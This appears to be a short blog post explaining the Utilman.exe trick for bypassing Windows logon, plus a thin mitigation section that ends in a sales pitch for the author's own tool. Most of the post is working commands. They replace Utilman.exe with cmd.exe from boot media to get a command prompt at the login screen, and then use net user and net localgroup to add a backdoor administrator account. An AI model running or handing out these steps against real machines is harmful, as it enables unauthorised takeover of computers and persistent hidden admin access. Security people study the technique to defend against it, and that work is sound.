Bypass Windows logons with Utilman.exe trick and Solution

Hole security in windows system

Utilman.exe is a Windows application that is designed to allow the user to configure Accessibility options such as the magnifier, High Contrast Theme, Narrator and On screen keyboard before they log onto the system.

This application is run as administrator, so the trick is replace utilman.exe with cmd.exe. You can use a linux distrubution, a windows cd, old bootable floppy disk to access to hard disk and rename utilman.exe to utilman.exe.bak, make a copy of cmd.exe and name it utilman.exe.

The main problem of this trick is that the antivirus or firewall are useless and everyone can modify your computers to obtain more information or run malicious software in your company network.

Example of commands:

> cd C:\Windows\System32
> ren Utilman.exe Utilman.exe.bak
> copy cmd.exe Utilman.exe

Restart your computer and before login press Windows Key +U and you should get a Command Prompt.

You can for example add a new administrator account and after delete it.

> net user Admin admin1234 /add
> net localgroup Administrators Admin /add

Solution

  1. you have to set a password for BIOS and set the primary boot device from your hard disk.
  2. disable the Utilman.exe. To disable utilman.exe before logon i have written a program compatible to all versions of windows 7, 8.

If you want protect your company with my program,please contact me by my online form.

Please leave you company name, number of employed, and your skype contact or phone.